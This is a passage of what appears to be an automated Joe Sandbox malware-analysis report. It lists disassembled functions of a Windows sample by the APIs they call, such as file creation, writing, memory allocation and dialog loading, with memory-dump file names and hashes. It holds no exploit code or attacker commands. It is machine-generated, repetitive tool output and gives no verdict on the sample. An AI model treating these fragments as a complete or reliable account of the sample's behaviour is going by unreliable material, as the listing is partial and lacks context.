malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040EA5E,00000000,?,?,?,?,0040E89D,?,004013F4), ref: 0041A397
__CxxThrowException@8.LIBVCRUNTIME ref: 0041AF52

Part of subcall function 00417E5F: RaiseException.KERNEL32(?,?,?,?,?), ref: 00417EBF

__CxxThrowException@8.LIBVCRUNTIME ref: 0041AF6F

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise_callnewhmalloc
String ID:
API String ID: 741831685-0
Opcode ID: 5188dd4440d2aebed5194a4df2a70dbb7e3a0744a34103635fae928e41412777
Instruction ID: f71766f8df808d0e3d19d2cfb548cc6a2cba49196036a5e802b877e77bbad8cb
Opcode Fuzzy Hash: 5188dd4440d2aebed5194a4df2a70dbb7e3a0744a34103635fae928e41412777
Instruction Fuzzy Hash: 1BF0BB7440530D76CB00B6B5E806ADE376C8A00714B504227BD34914D2EF7CEAFA81DF

Function 004040B7 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00000000,?,004026C8,00000000,00000000,?,?,?), ref: 004040C0
GetLastError.KERNEL32(?,004026C8,00000000,00000000,?,?,?), ref: 004040CA
SetLastError.KERNEL32(000000B7,?,004026C8,00000000,00000000,?,?,?), ref: 004040DA
GetFileAttributesW.KERNELBASE(?,?,004026C8,00000000,00000000,?,?,?), ref: 004040E7

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: fc3b4acc21d604c55579aa30976d1510510e2051daad52f76ce52624391b0c06
Instruction ID: ea16b448f520dc79c21dd080c1741ec492af41fa6e4510644d8e6435286e1c67
Opcode Fuzzy Hash: fc3b4acc21d604c55579aa30976d1510510e2051daad52f76ce52624391b0c06
Instruction Fuzzy Hash: 0BE092B0584214EBDB201BB5DC487AB3E58AB49769F10C532FB1AF01E1DB38885266AD

Function 004032CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 004032DC
GetNativeSystemInfo.KERNELBASE(?,?,00401CB5,?,00401A13,?,00401862,00000000), ref: 004032EA

Strings

GetNativeSystemInfo, xrefs: 004032D1

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: AddressInfoNativeProcSystem
String ID: GetNativeSystemInfo
API String ID: 2220751540-3949249589
Opcode ID: 050bbb88f7cf7218444c34c7b330fe598677fc76e94ff6b6c683a7f068fb1840
Instruction ID: ed6175da09a8fdebb0e1c5cb843e23d8266677c44094019fbcf6b946119c3695
Opcode Fuzzy Hash: 050bbb88f7cf7218444c34c7b330fe598677fc76e94ff6b6c683a7f068fb1840
Instruction Fuzzy Hash: CAD0A72034020896CB10AFF1AD425EB3BE8964C60875004B4A403F00D0EA79DD41D768

Function 00404AE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNELBASE(?,?,?), ref: 00404B24

Strings

pEa, xrefs: 00404AF9, 00404B16

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: EnvironmentVariable
String ID: pEa
API String ID: 1431749950-470506444
Opcode ID: 449d396a4c0592938005a495febcc4e1e637c5bd27616c37eebfc57c463b90e8
Instruction ID: c0725f4f22a8b11be2ee7f0584f20d2504650d76fe49a34672655117b88c2384
Opcode Fuzzy Hash: 449d396a4c0592938005a495febcc4e1e637c5bd27616c37eebfc57c463b90e8
Instruction Fuzzy Hash: 19F0F471A00018AFCB10ABD5EC4598DB778EB54344B4040BAE951E7271DF34E5558B99

Function 0040D2BA Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040D2D1
GetLastError.KERNEL32(?,?,?,?), ref: 0040D2DE

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 566180bda5cd697e6ffadec7a179c8b1af85430c6e7af7f385284b26b0bcd381
Instruction ID: fbbf36c10446a8afaa6e887ab57a6d4605db8d6981e568fa3a93448fb21df84f
Opcode Fuzzy Hash: 566180bda5cd697e6ffadec7a179c8b1af85430c6e7af7f385284b26b0bcd381
Instruction Fuzzy Hash: 6DF05E71904218ABCF04CFA9DC44ADF7BE8EF0A320B108169F816D73A1D231DD10ABA9

Function 00401ECF Relevance: 3.0, APIs: 2, Instructions: 31sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000014), ref: 00401EDF
EndDialog.USER32(00000000,00000000), ref: 00401F1B

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: DialogSleep
String ID:
API String ID: 2355613043-0
Opcode ID: 648b835b9d7420a1580e0270d6d219351fb6242d02cac78e384673360c5cd647
Instruction ID: eb96ffe11cc144af6055908b6645f6fe756304b6d041abb8b9a4700c22e9385a
Opcode Fuzzy Hash: 648b835b9d7420a1580e0270d6d219351fb6242d02cac78e384673360c5cd647
Instruction Fuzzy Hash: AFF08230345201ABCB388BC4ED89B667765EB54761FA001BAFA02AA2F0C7749881C79C

Function 0041AA5E Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0041B0AC: GetModuleHandleW.KERNEL32(00000000,0041AA27), ref: 0041B0AE

_c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041AA70
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,0041F4A0,00000014), ref: 0041AA9F

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: HandleModule_c_exit_exit
String ID:
API String ID: 750871209-0
Opcode ID: 35a5967350528554db479f19048b56f11e27a7bd188c72d566efeabd89bc8f4a
Instruction ID: 6887ee1ec2eb04b24837a7a7bb84dec1efbc51443f5b412f5016766e90586c20
Opcode Fuzzy Hash: 35a5967350528554db479f19048b56f11e27a7bd188c72d566efeabd89bc8f4a
Instruction Fuzzy Hash: B0E086319042499FDF21DFD4D9023DDB771FF44368F10455BD96123292C7391890CA99

Function 00408A5D Relevance: 1.9, APIs: 1, Instructions: 406COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408A62

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 235564eec409229d97f816f215ca7c653443c75497c79a7b64e69b3d441639b0
Instruction ID: e818be3151b219871231a97a865e02acf4b711aa7f8be8cd112908db7a22380f
Opcode Fuzzy Hash: 235564eec409229d97f816f215ca7c653443c75497c79a7b64e69b3d441639b0
Instruction Fuzzy Hash: 4D021874A0020A9FCF14DFA8C680AAEBBB5BF48314F14416EE855BB391DB34AD51CF95

Function 00409B35 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409B3A

Part of subcall function 0040AC38: __EH_prolog.LIBCMT ref: 0040AC3D

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2178e9eba65f95c9888116d06e9ba07af3601df2b0461c21cca6b67b8162f411
Instruction ID: 5c441e7a216b12d446c8107e1bef11311747ec2156c2b6c2d54135c0d6f242e7
Opcode Fuzzy Hash: 2178e9eba65f95c9888116d06e9ba07af3601df2b0461c21cca6b67b8162f411
Instruction Fuzzy Hash: C921C130A012059FDB25DF65C484F9EBBB4BF04304F0440AEE909AB292CB38EE40CB94

Function 004023BB Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00402407

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cde5d9bb005f108667f2f393147311b5deea907668607deb29ecae9b359384cc
Instruction ID: 1547520d6acc2d98160fec4895152a320b2b160caaaf5443f345e02eba4257ae
Opcode Fuzzy Hash: cde5d9bb005f108667f2f393147311b5deea907668607deb29ecae9b359384cc
Instruction Fuzzy Hash: BDF037312007049FC7249F69D948B57B3F4BF04305F00892EE886A6AA0D3B8E989CF98

Function 0040EEF7 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 0040EEFF

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 47a9cef0b716d5d9b8e0ec5851d3607f6657cac8c1bbded9b40d4ae61b7cb4e9
Instruction ID: 3da992b2f295af5ce21afc0a717871a74e5234c07e45486ad5bc5640170ddcfd
Opcode Fuzzy Hash: 47a9cef0b716d5d9b8e0ec5851d3607f6657cac8c1bbded9b40d4ae61b7cb4e9
Instruction Fuzzy Hash: 89E08C3628430DABE7008FA4E84070137A8AF44328F20C0AAE60CCE3A1E673C4418705

Function 0040D18D Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D16E: CloseHandle.KERNEL32(?,?,0040D198,?,?,0040D266,?,80000000,?,00000003,00000080,?,0040D223,?,00000000), ref: 0040D178

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,?,0040D266,?,80000000,?,00000003,00000080), ref: 0040D1AF

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 1bbb841870762bc1c1e414dd06521c7f091a5e84fde9cd7fad7ba1c582b794b3
Instruction ID: fee09c1f426cd636a184300f872697c070953ccbdfa0d046d13213d19b7ff1de
Opcode Fuzzy Hash: 1bbb841870762bc1c1e414dd06521c7f091a5e84fde9cd7fad7ba1c582b794b3
Instruction Fuzzy Hash: C5E0EC32440219BBCF215FE49C02FCA3F6AAF05770F148626FA546A1E1CB76D870AB94

Function 0040D3CE Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000001,00000000,?,0040D3AB,?,00000001,00000000,?,?,00000000,?,?,0040D753), ref: 0040D3F1

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4127b395853accabd2e5465692d083ea8a97eb870675eded0bf61330bd7facb8
Instruction ID: 8af7ede27650476760748d8f0974da74e75692923cad712dfaf754e07b4b19fe
Opcode Fuzzy Hash: 4127b395853accabd2e5465692d083ea8a97eb870675eded0bf61330bd7facb8
Instruction Fuzzy Hash: 5AE0EE31200209EFEB00CF50D881FAA37EAEB98720F50C128E9184A220C731EA21CF88

Function 0040D26A Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040D280

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: cd838928126058c2c8b2a636a48f166ca248dfecea264441a67339c135919567
Instruction ID: 306e40f79ff7d164134fc1a6269841cf36d0734ccbdcc09d557759cec589b085
Opcode Fuzzy Hash: cd838928126058c2c8b2a636a48f166ca248dfecea264441a67339c135919567
Instruction Fuzzy Hash: 25E0E236240208FFDB01CF90CC42FDEBBBAFB09314F208068E90596260C775AA24EB54

Function 0040AC38 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AC3D

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 43ffabbfe514dbf4d1133dd9f1f3e7bf2f97be2d10b4e08b2d8a3314a2d07d0a
Instruction ID: 38bc7f760aa6b3076ab140ed16226002fb98438f22e958dd4e8afeecd2fcf9db
Opcode Fuzzy Hash: 43ffabbfe514dbf4d1133dd9f1f3e7bf2f97be2d10b4e08b2d8a3314a2d07d0a
Instruction Fuzzy Hash: F3C012B1411114BBD7005B968806ADF7A7CDF01369F05451EB00063141C7BC9E4146FA

Function 0040D367 Relevance: 1.5, APIs: 1, Instructions: 11timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,00000000,00000000,?,?,004023EA,?), ref: 0040D373

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: bac2da2bfcccfcae6f9c2c353ab7bee9ebe29119db37a6ba71e2867168e47a0c
Instruction ID: ca77b6d02caa7ed7f3242838f1bdd2aee9a02485bc02e7d56acfa8784285b47f
Opcode Fuzzy Hash: bac2da2bfcccfcae6f9c2c353ab7bee9ebe29119db37a6ba71e2867168e47a0c
Instruction Fuzzy Hash: D3C04C31280318B7D6111AA2DC06F857B5DAB11B50F10C025B604585B1D662A470AA59

Function 0040D5D5 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0040D604

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: f06f2ed0a0a52337a91e070dedfdbb512f8aaae1242cd9204ce51c8f897c205a
Instruction ID: 49439f3755443ca4daedc7ce2aa9e15476dac3a8f321418512abce0645eeaede
Opcode Fuzzy Hash: f06f2ed0a0a52337a91e070dedfdbb512f8aaae1242cd9204ce51c8f897c205a
Instruction Fuzzy Hash: 7401AD35A00516EBCB14CE94C9009ABB775BF46354B10493AAC0AAB390D73AED06DBD8

Function 0040C340 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,?,0040C32F,?), ref: 0040C359

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 582c648b8839900d5345e01be33458bd1fd7a318027582ea914fbc4fff975b15
Instruction ID: 60fc05ea96e579318a1b7a11e861cd9910d93ad6900d9886fe920b821d4e3c39
Opcode Fuzzy Hash: 582c648b8839900d5345e01be33458bd1fd7a318027582ea914fbc4fff975b15
Instruction Fuzzy Hash: 98C0123128420CEBEB100BD4EC86BE53A989708BAAF40C021FB0C684D0D2B1A0A08698

Function 0040C361 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,?,0040C33D,?), ref: 0040C374

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 72ea4c8a59593272f5669ecaf9d79730d52e98609149601b2796f29e9bbec680
Instruction ID: e6744d43e18db1d2c52cc6761727822990cd303ec9133c303e5c13806bbf2fd9
Opcode Fuzzy Hash: 72ea4c8a59593272f5669ecaf9d79730d52e98609149601b2796f29e9bbec680
Instruction Fuzzy Hash: 09C04C30180608E7DB211B54DC49BD93A58A705756F50C121BA0D285E0D7B565D4DA88

Non-executed Functions

Function 00407483 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 004074C1
GetDC.USER32(00000000), ref: 004074CC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004074D7
MulDiv.KERNEL32(?,00000048,00000000), ref: 004074E6
ReleaseDC.USER32(00000000,00000000), ref: 004074F4
GetModuleHandleW.KERNEL32(00000000), ref: 0040751C
FindResourceA.KERNEL32(00000000,?,00000005), ref: 00407531
LoadResource.KERNEL32(00000000,00000000), ref: 0040753D
LockResource.KERNEL32(00000000), ref: 00407548
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007224), ref: 00407566

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Resource$CapsDeviceDialogFindHandleIndirectInfoLoadLockModuleParamParametersReleaseSystem
String ID:
API String ID: 1373584218-0
Opcode ID: 3a05be7e687ef5f13c10972e9a2e067480196be0dd54add7a9c6104d58a54cc0
Instruction ID: 737d20d5fbffcab560bb8a7c5625c9b578bc60d9d11df34ce8b9be94154be4c5
Opcode Fuzzy Hash: 3a05be7e687ef5f13c10972e9a2e067480196be0dd54add7a9c6104d58a54cc0
Instruction Fuzzy Hash: 7C219275980214BBE7215B659C88EFB7B7CEF49745F0040B9F905E2190D7748E81CB69

Function 00407280 Relevance: 13.6, APIs: 9, Instructions: 98stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 004072A4
GetLastError.KERNEL32(?,0000FDE9,00000000), ref: 004072B4
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 004072DC
FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 004072F3
lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00407306
lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 0040730D
lstrcpyW.KERNEL32(00000000,?), ref: 00407339
lstrcpyW.KERNEL32(00000002,00000000), ref: 0040734C
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 0040735F

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
